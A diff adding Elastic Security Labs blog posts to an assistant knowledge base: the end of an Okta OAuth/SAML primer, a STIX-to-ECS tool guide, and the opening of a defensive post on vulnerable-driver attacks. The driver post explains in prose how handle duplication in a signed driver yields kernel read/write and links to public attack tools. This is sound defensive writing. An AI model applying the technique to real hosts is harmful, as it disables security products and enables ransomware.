+GET /oauth2/default/v1/authorize?response_type=code \ 
+&client_id=CLIENT_ID&redirect_uri=REDIRECT_URI&scope=SCOPE
+```
+
+### Step 2 - User authentication and consent:
+
+Once the request is made, the user is prompted to authenticate with Okta and give consent for the requested scopes. This step is fundamental for user verification and to ensure that the user is informed about the type of access being granted to the application.
+
+### Step 3 - Authorization code reception:
+
+Post authentication and consent, Okta responds to the client with an authorization code. This code is short-lived and is exchanged for a more permanent secret to make further requests - an access token.
+
+Example token exchange request:
+
+```
+POST /oauth2/default/v1/token
+Content-Type: application/x-www-form-urlencoded
+
+grant_type=authorization_code&
+code=AUTHORIZATION_CODE&
+redirect_uri=REDIRECT_URI&
+client_id=CLIENT_ID&
+client_secret=CLIENT_SECRET
+```
+
+### Step 4 - Redirect URIs and client authentication
+
+Redirect URIs play a pivotal role in the security of the OAuth 2.0 flow. They are pre-registered URLs to which Okta sends the authorization code. The integrity of these URIs is paramount, as they ensure that the response is only sent to the authorized client.
+
+The client application is authenticated at the token endpoint, usually by providing the ```client_id``` and ```client_secret```. This step is crucial to verify the identity of the client application and prevent unauthorized access.
+
+### Step 5 - Token exchange
+
+In the final step, the client makes an HTTP POST request to Okta’s token endpoint, exchanging the authorization code for an access token. This access token is then used to make API requests on behalf of the user.
+
+The inclusion of client credentials (client ID and client secret) in this request is a critical security measure, ensuring that the token is only issued to the legitimate client. 
+
+## Access tokens and scopes
+
+An [access token](https://www.okta.com/identity-101/access-token/) is a compact code carrying extensive data about a user and their permissions. It serves as a digital key, facilitating communication between a server and a user's device. Commonly used in various websites, access tokens enable functionalities like logging in through one website (like Facebook) to access another (like Salesforce).
+
+### Composition of an access token:
+
+An access token typically comprises three distinct parts, each serving a specific purpose:
+
+ - *Header*: This section contains metadata about the token, including the type of token and the algorithm used for encryption.
+ - *Payload (claims)*: The core of the token, includes user-related information, permissions, group memberships, and expiration details. The payload dictates whether a user can access a specific resource, depending on the permissions granted within it. Developers can embed custom data in the payload, allowing for versatile applications, such as a single token granting access to multiple APIs.
+ - *Signature*: A hashed verification segment that confirms the token's authenticity. This makes the token secure and challenging to tamper with or replicate.
+
+A common format for access tokens JWT as we previously discussed, which is concise yet securely encodes all necessary information.
+
+### Scopes and permissions:
+
+[Scopes](https://developer.okta.com/docs/api/oauth2/) in OAuth 2.0 are parameters that define the level and type of access the client requests. Each scope translates into specific permissions granted to the access token. For instance, a scope of email would grant the client application access to the user's email address. The granularity of scopes allows for precise control over what the client can and cannot do with the access token, adhering to the principle of least privilege.
+
+### Token lifespan and refresh tokens:
+
+Access tokens are inherently short-lived for security reasons, reducing the window of opportunity for token misuse in case of unintended disclosure. Okta allows customization of [token lifespans](https://support.okta.com/help/s/article/What-is-the-lifetime-of-the-JWT-tokens?language=en_US#:~:text=ID%20Token%3A%2060%20minutes,Refresh%20Token%3A%2090%20days) to suit different security postures. Once an access token expires, it can no longer be used to access resources.
+
+[Refresh tokens](https://developer.okta.com/docs/guides/refresh-tokens/main/), where employed, serve to extend the session without requiring the user to authenticate again. A refresh token can be exchanged for a new access token, thus maintaining the user's access continuity to the application. The use of refresh tokens is pivotal in applications where the user remains logged in for extended periods.
+
+### Token storage:
+
+Regarding [token storage](https://auth0.com/docs/secure/security-guidance/data-security/token-storage), browser-based applications such as those utilizing services like Okta, are vital secure storage of access tokens is a critical aspect of user session management. These tokens are typically stored using one of several methods: browser in-memory storage, session cookies, or browser local/session storage. In-memory storage, preferred for its strong defense against XSS attacks, holds the token within the JavaScript memory space of the application, although it loses the token upon page refresh or closure. Session cookies offer enhanced security by being inaccessible to JavaScript, thereby reducing XSS vulnerabilities, but require careful implementation to avoid CSRF attacks. Local and session storage options, while convenient, are generally less recommended for sensitive data like access tokens due to their susceptibility to XSS attacks. The choice of storage method will depend on the application where a traditional web page, mobile device, or single-page app is being used.
+
+### Security and expiration:
+
+The security of access tokens is of paramount importance in safeguarding user authentication and authorization processes, especially during their transmission over the internet. Encrypting these tokens is crucial, as it ensures that their contents remain confidential and impervious to unauthorized access. Equally important is the use of secure communication channels, notably HTTPS, to prevent the interception and compromise of tokens in transit. Furthermore, the signature component of a token, particularly in JWTs, plays a vital role in verifying its authenticity and integrity. This signature confirms that the token has not been altered and is genuinely issued by a trusted authority, thus preventing the risks associated with token forgery and replay attacks.
+
+Access tokens are inherently designed with expiration mechanisms, a strategic choice to mitigate the risks associated with token theft or misuse. This finite lifespan of tokens necessitates regular renewal, typically managed through refresh tokens, thereby ensuring active session management and reducing opportunities for unauthorized use. The storage and handling of these tokens in client applications also significantly impact their overall security. Secure storage methods, such as in-memory or encrypted cookies, alongside careful management of token renewal processes, are essential to prevent unauthorized access and maintain the robustness of user sessions and access controls.
+
+# Authentication workflow
+
+## Authentication vs authorization
+Before we dive into authentication in Okta, we should take a moment to understand the difference between authentication and authorization. To put it simply, authentication is providing evidence to prove identity, whereas authorization is about permissions and privileges once access is granted. 
+
+As we discussed throughout this blog, the Identity Engine and UD are critical to identity management in Okta. As a recap, the Identity Engine is used for enrolling, authentications, and authorizing users. The UD is used as the main directory service in Okta that contains users, groups, profiles, and policies, also serving as the source of truth for user data. The UD can be synchronized with other directory services such as AD or LDAP through the Okta endpoint agent.
+
+Identity management can be managed via Okta or through an external IdP, such as Google Workspace. Essentially, when access to an application is requested, redirection to the authorization server’s endpoint APIs for authentication are generated to provide proof of identity.
+
+Below are the main authentication protocols between the end user, resource server, and authorization server:
+
+ - OIDC: Authentication protocol that sits on top of the OAuth authorization framework. Workflow requires an ID token (JWT) to be obtained during an access token request.
+ - SAML: Open standard protocol formatted in XML that facilitates user identity data exchange between SPs and IdPs.
+
+Within Okta, there is plenty of flexibility and customization regarding authentication. Basic authentication is supported where simple username and password schemes are used over HTTP with additional parameters and configurations.
+
+## SAML in authentication
+
+As previously stated, [SAML](https://developer.okta.com/docs/concepts/saml/) is a login standard that helps facilitate user access to applications based on HTTP(s) requests and sessions asynchronously. Over time the use of basic credentials for each application quickly became a challenge and thus federated identity was introduced to allow identity authentication across different SPs, facilitated by the identity providers. 
+
+SAML is primarily a web-based authentication mechanism as it relies on a flow of traffic between the end user, IdP, and SP. The SAML authentication flow can either be IdP or SP initiated depending on where the end user visits first for application access.
+
+The SAML request is typically generated by the SP whereas the SAML response is generated by the IdP. The response contains the SAML assertion, which contains information about the authenticated user’s identity and a signed signature by the IdP.
+
+It is important to note that during the SAML workflow, the IdP and SP typically never communicate directly, but instead rely on the end user’s browser for redirections. Typically, the SP trusts the IdP and thus the identity data forwarded through the user’s web browser to the SP is trusted in access is granted to the application requested.
+
+![Diagram depicting Okta SAML authentication process](/assets/images/starter-guide-to-understanding-okta/image1.png)
+
+In step 5 from the diagram above, the SAML assertion would be sent as part of this response after the user has authenticated with the IdP. Remember that the assertion is in XML format and can be quite extensive as it contains identity information for the SP to parse and rely on for the end user’s identity verification. Generic examples of SAML assertions are [provided](https://www.samltool.com/generic_sso_res.php) by OneLogin. Auth0 also [provides](https://samltool.io/) a decoder and parser for these examples as well which is shown in the image below.
+
+![Auth0 decoder and parser for SAML](/assets/images/starter-guide-to-understanding-okta/image2.png)
+
+## IdP vs SP responsibilities
+
+When discussing the roles and responsibilities of the SP and IdP, keep in mind that the SP is meant to provide access to applications for the end user, whereas the IdP provides authentication and authorization. The SP and IdP are typically set up to trust each other with their designated responsibilities. Depending on the end user, workflows for authentication and authorization can be SP or IdP initiated where RESTful API endpoints are typically depended on for each workflow. For authentication, requests and responses are sent from the IdP and SP but often proxied through the end user’s browser.
+
+Although Okta is mainly an IdP and provides authentication and authorization services, it can also be used as an SP. Previously we discussed how Okta’s integration network allows for various 3rd-party applications to be connected and accessible to users through their dashboard. We also explained how authentication workflows can be SP initiated, meaning users could visit their Okta dashboard to request access to an application. At the same time, a 3rd-party IdP could be established such as Google Workspace or Azure AD which would handle the authentication and authorization of the user. If the user were to request access with this type of setup, Okta would then redirect the user to Azure AD for authentication.
+
+## Single-factor vs multi-factor authentication
+
+Single-factor authentication (SFA) is the simplest form of authentication, requiring a user to supply one credential object for authentication. Commonly, users are familiar with password-based authentication methods where a username and password are supplied to validate themselves. This of course has security implications if the credentials used are stolen as they can be used by an adversary to login and access the same resources.
+
+Multifactor authentication (MFA) is similar to SFA, except it requires two or more types of credentials or evidence to be supplied for authentication, typically in sequence. For example, a password-based credential may be supplied and once verified by the IdP, then requested by an OTP be supplied by a mobile device authenticator application, SMS message, email, and others. The common types of authentication factors are something that the user knows, possesses, or is inherent. This also increases the complexity to adversaries based on randomized string generation for OTPs and MFA token expirations.
+
+Okta enables other types of authentication methods such as passwordless, risk-based, biometric, transaction, and others. A full list of authentication methods and descriptions can be found [here](https://developer.okta.com/docs/concepts/iam-overview-authentication-factors/#authentication-methods).
+
+Every application or integration added to the Okta organization has an [authentication policy](https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/about-app-sign-on-policies.htm), which verifies conditions for users who attempt to access each application. Authentication policies can also help enforce factor requirements based on these conditions where the UD and user profile are used to analyze information about the user. Authentication policies can be set globally for applications and users or can be more granular if set at the application level where specific user conditions are met. Authentication policies can be updated, cloned, preset, and merged if duplicate policies. Rules that define these granular conditions can be applied to these authentication policies with the Okta Expression Language ([EL](https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/el-about.htm)). 
+
+## Client-side and server-side communications
+
+Understanding the distinction between front-end (user-browser interactions) and back-end (server-to-server communications) is crucial in web-based authentication systems. Front-end interactions typically involve user interfaces and actions, while back-end channels handle critical exchanges like SAML assertions or OAuth tokens, crucial for secure authentication.
+
+In Okta's framework, the interplay between browser and server is key for security and user experience. When a user logs in via Okta, the browser first authenticates with Okta, which then sends back the necessary tokens. These are forwarded to the application server which validates them with Okta, ensuring a secure, behind-the-scenes token exchange.
+
+Okta’s token management is marked by stringent security. Issued tokens like ID and access tokens are securely exchanged among the user’s browser, Okta, and application servers. Protocols like HTTPS and OAuth 2.0 safeguard these transmissions. Features like token rotation and automatic revocation further bolster security, preventing unauthorized access.
+
+Integrating Okta into an application reshapes its design and security. This offloads significant security responsibilities, allowing developers to focus on core functions. Such integration leads to a modular architecture, where authentication services are separate from application logic. 
+
+# Conclusion
+
+We’ve unraveled the complexities of Okta’s architecture and services, providing insights into its role as a leader in modern authentication and authorization. With the platform’s utilization of protocols like OAuth, OIDC, and SAML, Okta stands at the forefront of scalable, integrated solutions, seamlessly working with platforms such as Azure AD and Google Workspace.
+
+Okta's SaaS design, featuring a RESTful API, makes it a versatile Identity Provider (IdP) and Service Provider (SP). Yet, its popularity also brings potential security vulnerabilities. For cybersecurity professionals, it’s crucial to grasp Okta’s complexities to stay ahead of evolving threats. This introduction sets the stage for upcoming deeper analyses of Okta's attack surface, the setup of a threat detection lab, and the exploration of common attacks.
+
+Armed with this knowledge, you’re now better equipped to analyze, understand, and mitigate the evolving cybersecurity challenges associated with Okta’s ecosystem.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/stixy_situations_ecsaping_your_threat_data.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/stixy_situations_ecsaping_your_threat_data.md
new file mode 100644
index 0000000000000..6f898d0844665
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/stixy_situations_ecsaping_your_threat_data.md
@@ -0,0 +1,258 @@
+---
+title: "STIXy Situations: ECSaping your threat data"
+subtitle: "Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack."
+slug: "stixy-situations-ecsaping-your-threat-data"
+date: "2024-02-09"
+description: "Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack."
+author:
+  - slug: cyril-francois
+  - slug: andrew-pease
+image: "photo-edited-07@2x.jpg"
+category:
+  - slug: tools
+---
+
+## Preamble
+Organizations that use threat indicators or observables consume, create, and/or (ideally) publish threat data. This data can be used internally or externally as information or intelligence to inform decision-making and event prioritization.
+
+While there are several formats for this information to be structured into, the de facto industry standard is [Structured Threat Information Expression (STIX)](https://oasis-open.github.io/cti-documentation/stix/intro). STIX is managed by the [OASIS Cyber Threat Intelligence Technical Committee](https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti) and enables organizations to share threat data in a standard and machine-readable format.
+
+At Elastic, we developed the [Elastic Common Schema (ECS)](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) as a data normalization capability. “[ECS] is an open source specification, developed with support from the Elastic user community. ECS defines a common set of fields for storing event data in Elasticsearch, such as logs and metrics.” In April of 2023, [Elastic contributed ECS](https://www.elastic.co/blog/ecs-elastic-common-schema-otel-opentelemetry-announcement) to the [OpenTelemetry Semantic Conventions (OTel)](https://opentelemetry.io/docs/concepts/semantic-conventions/) as a commitment to the joint development of an open schema. 
+
+The security community shares threat data in the STIX format, so to store that data in Elasticsearch for analysis and threat detection [[1](https://www.elastic.co/guide/en/security/current/threat-intel-hash-indicator-match.html)] [[2](https://www.elastic.co/guide/en/security/current/threat-intel-ip-address-indicator-match.html)] [[3](https://www.elastic.co/guide/en/security/current/threat-intel-url-indicator-match.html)] [[4](https://www.elastic.co/guide/en/security/current/threat-intel-windows-registry-indicator-match.html)], we created a tool that converts STIX documents into ECS and outputs the threat data either as a file or directly into Elasticsearch indices. If this was a challenge for us, it was a challenge for others - therefore, we decided to release a version of the tool.
+
+This tool uses the [Elastic License 2.0](https://www.elastic.co/licensing/elastic-license) and is available for download [here](https://github.com/elastic/labs-releases/tree/main/tools/stix-to-ecs).
+
+## Getting started
+This project will take a STIX 2.x formatted JSON document and create an ECS version. There are three output options: STDOUT as JSON, an NDJSON file, and/or directly to an Elasticsearch cluster.
+
+### Prerequisites
+The STIX 2 ECS project requires Python 3.10+ and the [stix2](https://pypi.org/project/stix2/), [Elasticsearch](https://pypi.org/project/elasticsearch/), and [getpass](https://pypi.org/project/getpass4/) modules.
+
+If exporting to Elasticsearch, you will need the host information and authentication credentials. API authentication is not yet implemented.
+
+### Setup
+Create a virtual environment and install the required prerequisites.
+
+```
+git clone https://github.com/elastic/labs-releases.git
+cd tools/stix2ecs
+python -m venv /path/to/virtual/environments/stix2ecs
+source /path/to/virtual/environments/stix2ecs/bin/activate
+python -m pip install -r requirements.txt
+```
+
+## Operation
+The input is a STIX 2.x JSON document (or a folder of JSON documents); the output defaults to STDOUT, with an option to create an NDJSON file and/or send to an Elasticsearch cluster.
+
+```
+stix_to_ecs.py [-h] -i INPUT [-o OUTPUT] [-e] [--index INDEX] [--url URL] \
+[--user USER] [-p PROVIDER] [-r]
+```
+
+By default, the ECS file is named the same as the STIX file input but with `.ecs.ndjson` appended.
+
+### Arguments
+The script has several arguments, the only mandatory field is `-i` for the input. By default, the script will output the NDJSON document to STDOUT.
+
+| Option | Description |
+| - | - |
+| -h | displays the help menu |
+| -i | specifies the input STIX document (mandatory) |
+| -o | specifies the output ECS document (optional) |
+| -p | defines the ECS provider field (optional) |
+| -r | recursive mode to convert multiple STIX documents (optional) |
+| -e | specifies the Elasticsearch output mode (optional) |
+| --index | defines the Elasticsearch Index, requires `-e` (optional) |
+| --url | defines the Elasticsearch URL, requires `-e` (optional) |
+| --user | defines the Elasticsearch username, requires `-e` (optional) |
+
+## Examples
+There are two sample files located in the `test-inputs/` directory. One is from [CISA](https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/automated-indicator-sharing-ais) (Cybersecurity & Infrastructure Security Agency), and one is from [OpenCTI](https://github.com/OpenCTI-Platform/opencti) (an open source threat intelligence platform).
+
+### STIX file input to STDOUT
+This will output the STIX document to STDOUT in ECS format.
+
+```
+python stix_to_ecs.py -i test-inputs/cisa_sample_stix.json | jq
+
+[
+  {
+    "threat": {
+      "indicator": {
+        "file": {
+          "name": "123.ps1",
+          "hash": {
+            "sha256": "ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44"
+          }
+        },
+        "type": "file",
+        "description": "Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}",
+        "first_seen": "2023-11-21T18:57:25.000Z",
+        "provider": "identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01",
+        "modified_at": "2023-11-21T18:57:25.000Z",
+        "marking": {
+          "tlp": "clear"
+        }
+      }
+    }
+  },
+...
+```
+
+### STIX file input to ECS file output
+This will create a folder called `ecs` in the present directory and write the ECS file there.
+
+```
+python python stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -o ecs
+
+cat ecs/cisa_sample_stix.ecs.ndjson | jq
+{
+  "threat": {
+    "indicator": {
+      "file": {
+        "name": "123.ps1",
+        "hash": {
+          "sha256": "ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44"
+        }
+      },
+      "type": "file",
+      "description": "Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}",
+      "first_seen": "2023-11-21T18:57:25.000Z",
+      "provider": "identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01",
+      "modified_at": "2023-11-21T18:57:25.000Z",
+      "marking": {
+        "tlp": "clear"
+      }
+    }
+  }
+}
+...
+```
+
+### STIX file input to ECS file output, defining the Provider field
+The provider field is commonly a GUID in the STIX document. To make it more user-friendly, you can use the `-p` argument to define the `threat.indicator.provider` field.
+
+```
+python stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -o ecs -p "Elastic Security Labs"
+
+cat ecs/cisa_sample_stix.ecs.ndjson | jq
+{
+  "threat": {
+    "indicator": {
+      "file": {
+        "name": "123.ps1",
+        "hash": {
+          "sha256": "ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44"
+        }
+      },
+      "type": "file",
+      "description": "Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}",
+      "first_seen": "2023-11-21T18:57:25.000Z",
+      "provider": "Elastic Security Labs",
+      "modified_at": "2023-11-21T18:57:25.000Z",
+      "marking": {
+        "tlp": "clear"
+      }
+    }
+  }
+}
+...
+```
+
+### STIX directory input to ECS file outputs
+If you have a directory of STIX documents, you can use the `-r` argument to recursively search through the directory and write the ECS documents to the output directory.
+
+```
+python stix_to_ecs.py -ri test-inputs -o ecs
+```
+
+### STIX file input to Elasticsearch output
+To output to Elasticsearch, you can use either Elastic Cloud or a local instance. Local Elasticsearch will use port `9200` and Elastic Cloud will use port `443`. By default, a valid TLS session to Elasticsearch is required.
+
+First, create an index if you don't already have one. In this example, we’re creating an index called `stix2ecs`, but the index name isn’t relevant.
+
+```
+curl -u {username} -X PUT "https://elasticsearch:port/stix2ecs?pretty"
+
+{
+  "acknowledged" : true,
+  "shards_acknowledged" : true,
+  "index" : "stix2ecs"
+}
+```
+
+Next, define the Elasticsearch output options.
+
+```
+python stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -e --url https://elasticsearch:port --user username --index stix2ecs
+```
+
+If you’re storing the data in Elasticsearch for use in another platform, you can view the indicators using cURL.
+
+```
+curl -u {username} https://elasticsearch:port/stix2ecs/_search?pretty
+
+{
+  "took" : 2,
+  "timed_out" : false,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  },
+  "hits" : {
+    "total" : {
+      "value" : 3,
+      "relation" : "eq"
+    },
+    "max_score" : 1.0,
+    "hits" : [
+      {
+        "_index" : "stix2ecs",
+        "_id" : "n2lt8IwBahlUtp0hzm9i",
+        "_score" : 1.0,
+        "_source" : {
+          "threat" : {
+            "indicator" : {
+              "file" : {
+                "name" : "123.ps1",
+                "hash" : {
+                  "sha256" : "ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44"
+                }
+              },
+              "type" : "file",
+              "description" : "Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}",
+              "first_seen" : "2023-11-21T18:57:25.000Z",
+              "provider" : "identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01",
+              "modified_at" : "2023-11-21T18:57:25.000Z",
+              "marking" : {
+                "tlp" : "clear"
+              }
+            }
+          }
+        }
+      }
+...
+```
+
+If you’re using Kibana, you can [create a Data View](https://www.elastic.co/guide/en/kibana/current/data-views.html) for your `stix2ecs` index to view the ingested indicators. 
+
+![STIX2ECS data in Kibana](/assets/images/stixy-situations-ecsaping-your-threat-data/image1.png "STIX2ECS data in Kibana")
+
+
+Finally, you can use this as an indicator source for [Indicator Match rules](https://www.elastic.co/guide/en/security/current/prebuilt-rule-1-0-2-threat-intel-indicator-match.html).
+
+![Indicator Match rule created with STIX2ECS data](/assets/images/stixy-situations-ecsaping-your-threat-data/image2.png "Indicator Match rule created with STIX2ECS data")
+
+
+## Summary
+We hope this project helps your organization analyze and operationalize your threat data. If you’re new to the Elastic Common Schema, you can learn more about that [here](https://www.elastic.co/guide/en/ecs/current/index.html). 
+
+As always, please feel free to open an [issue](https://github.com/elastic/labs-releases/issues) with any questions, comments, concerns, or complaints. 
+
+## About Elastic Security Labs
+Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.
+
+Follow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). 
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/stopping_vulnerable_driver_attacks.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/stopping_vulnerable_driver_attacks.md
new file mode 100644
index 0000000000000..c9be21654124f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/stopping_vulnerable_driver_attacks.md
@@ -0,0 +1,79 @@
+---
+title: "Stopping Vulnerable Driver Attacks"
+slug: "stopping-vulnerable-driver-attacks"
+date: "2023-03-01"
+subtitle: "Using vulnerable drivers to gain kernel mode execution."
+description: "This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers."
+author:
+  - slug: joe-desimone
+image: "blog-thumb-clock-gears.jpg"
+category:
+  - slug: security-operations
+  - slug: detection-science
+---
+
+## Key takeaways
+
+- Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products.
+- Elastic Security [released](https://github.com/elastic/protections-artifacts/search?q=VulnDriver) 65 YARA rules to detect vulnerable driver abuse.
+- Elastic Endpoint (8.3+) protects users from this threat.
+
+## Background
+
+In 2018, [Gabriel Landau](https://twitter.com/GabrielLandau) and [Joe Desimone](https://twitter.com/dez_) presented a [talk](https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf) at Black Hat covering the evolution of kernel mode threats on Windows. The most concerning trend was towards leveraging known good but vulnerable drivers to gain kernel mode execution. We showed this was practical, even with hypervisor mode integrity protection ([HVCI](https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-hvci-enablement)) and Windows Hardware Quality Labs ([WHQL](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature)) signing requirement enabled. At the time, the risk to everyday users was relatively low, as these techniques were mostly leveraged by advanced state actors and top red teams.
+
+Fast forward to 2022, and attacks leveraging vulnerable drivers are a growing concern due to a [proliferation](https://github.com/hfiref0x/KDU) of open source [tools](https://github.com/br-sn/CheekyBlinder) to perform these [attacks](https://github.com/Cr4sh/KernelForge). Vulnerable drivers have now been [used by ransomware](https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/) to terminate security software before encrypting the system. Organizations can reduce their risk by limiting administrative user permissions. However, it is also imperative for security vendors to protect the user-to-kernel boundary because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. Kernel access gives attackers free rein to tamper or terminate endpoint security products or inject code into protected processes.
+
+This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.
+
+## Attack flow
+
+There are a number of flaws in drivers that can allow attackers to gain kernel mode access to fully compromise the system and remain undetected. Some of the [most common](https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/) flaws include granting user mode processes write access to virtual memory, physical memory, or [model-specific registers](https://en.wikipedia.org/wiki/Model-specific_register) (MSR). Classic buffer overflows and missing bounds checks are also common.
+
+A less common driver flaw is unrestricted [handle duplication](https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458). While this may seem like innocuous functionality at first glance, handle duplication can be leveraged to gain full kernel code execution by user mode processes. For example, the latest [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer) driver by Microsoft exposes [such a function](https://github.com/Yaxser/Backstab).
+
+An attacker can leverage this vulnerability to duplicate a [sensitive handle](https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458) to raw physical memory present in the System (PID 4) process.
+
+![Handle to Physical Memory in the System process](/assets/images/stopping-vulnerable-driver-attacks/image1.jpg)
+
+After obtaining [the cr3 value](http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf), the attacker can walk the page tables to convert virtual kernel addresses to their associated physical addresses. This grants an arbitrary virtual read/write primitive, which attackers can leverage to easily tamper with kernel data structures or execute arbitrary kernel code. On HVCI-enabled systems, thread control flow can be hijacked to execute arbitrary kernel functions as shown below.
+
+![Hijacking Threat Flow Control](/assets/images/stopping-vulnerable-driver-attacks/image3.jpg)
+
+We reported this issue to Microsoft in the vulnerable driver [submission portal](https://www.microsoft.com/en-us/wdsi/driversubmission) on July 26, but as of this writing have not received a response. We hope Microsoft will consider this a serious security issue worth addressing. Ideally, they will release a fixed version without the vulnerable [IOCTLs](https://docs.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-) and include it in the default HVCI blocklist. This would be consistent with the [blocking](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/ce56a2f15015e07bf35cd05ce3299340d16e759a/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md?plain=1#L391) of the ProcessHacker (now known as [System Informer](https://github.com/winsiderss/systeminformer)) driver for the [same flaw.](https://www.unknowncheats.me/forum/downloads.php?do=file&id=25441)
+
+## Blocklisting
+
+Blocklisting prevents known vulnerable drivers from loading on a system, and is a great first step to the vulnerable driver problem. Blocklisting can raise the cost of kernel attacks to levels out of reach for some criminal groups, while maintaining low false positive rates. The downside is it does not stop more [advanced groups](https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/), which can identify new, previously-unknown, vulnerable drivers.
+
+Microsoft maintains a [catalog](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md) of known exploited or malicious drivers, which should be a minimum baseline. This catalog consists of rules using various combinations of [Authenticode](https://reversea.me/index.php/authenticode-i-understanding-windows-authenticode/) hash, certificate hash (also known as [TBS](https://www.rfc-editor.org/rfc/rfc5280#section-4.1)), internal file name, and version. The catalog is intended to be used by Windows Defender Application Control ([WDAC](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview)). We used this catalog as a starting point for a more comprehensive list using the [YARA](https://virustotal.github.io/yara/) community standard.
+
+To expand on the existing list of known vulnerable drivers, we pivoted through VirusTotal data with known vulnerable import hashes and other metadata. We also combed through public attack tooling to identify additional vulnerable drivers. As common practice for Elastic Security, we made our [blocklist](https://github.com/elastic/protections-artifacts/search?q=VulnDriver) available to the community. In Elastic [Endpoint Security](https://www.elastic.co/security/endpoint-security) version 8.3 and newer, all drivers are validated against the blocklist in-line before they are allowed to load onto the system (shown below).
+
+![enter image description here](/assets/images/stopping-vulnerable-driver-attacks/image6.jpg)
+
+## Allowlisting
+
+One of the most robust defenses against this driver threat is to only allow the combination of driver signer, internal file name, version, and/or hashes, which are known to be in use. We recommend organizations be as strict as feasible. For example, do not blanket trust all [WHQL](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-test-signature-program) signed drivers. This is the classic application control method, albeit focusing on drivers. An organization’s diversity of drivers should be more manageable than the entirety of user mode applications. Windows Defender Application Control ([WDAC](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview)) is a powerful built-in feature that can be configured this way. However, the learning curve and maintenance costs may still be too high for organizations without well-staffed security teams. To reap most of the benefits of the allowlisting approach, but reduce the cost of implementation to the users (ideally to blocklisting levels), we recommend two approaches in tandem: behavior control and alert on first seen.
+
+## Behavior control
+
+The concept behind behavior control is to produce a more manageable set of allowlistable behavior choke points that can be tuned for high confidence. For example, we can create a behavior control around which applications are allowed to write drivers to disk. This may start with a relatively loose and simple rule:
+
+![Example EQL Query](/assets/images/stopping-vulnerable-driver-attacks/image2.jpg)
+
+From there, we can allowlist the benign applications that are known to exhibit this behavior. Then we receive and triage hits, tune the rule until it becomes high confidence, and then ship as part of our [malicious behavior protection](https://www.elastic.co/blog/whats-new-elastic-security-7-15-0). Elastic SIEM users can use the same technique to [create custom](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) Detection Engine [rules](https://github.com/elastic/detection-rules) tuned specifically for their environment.
+
+## First seen
+
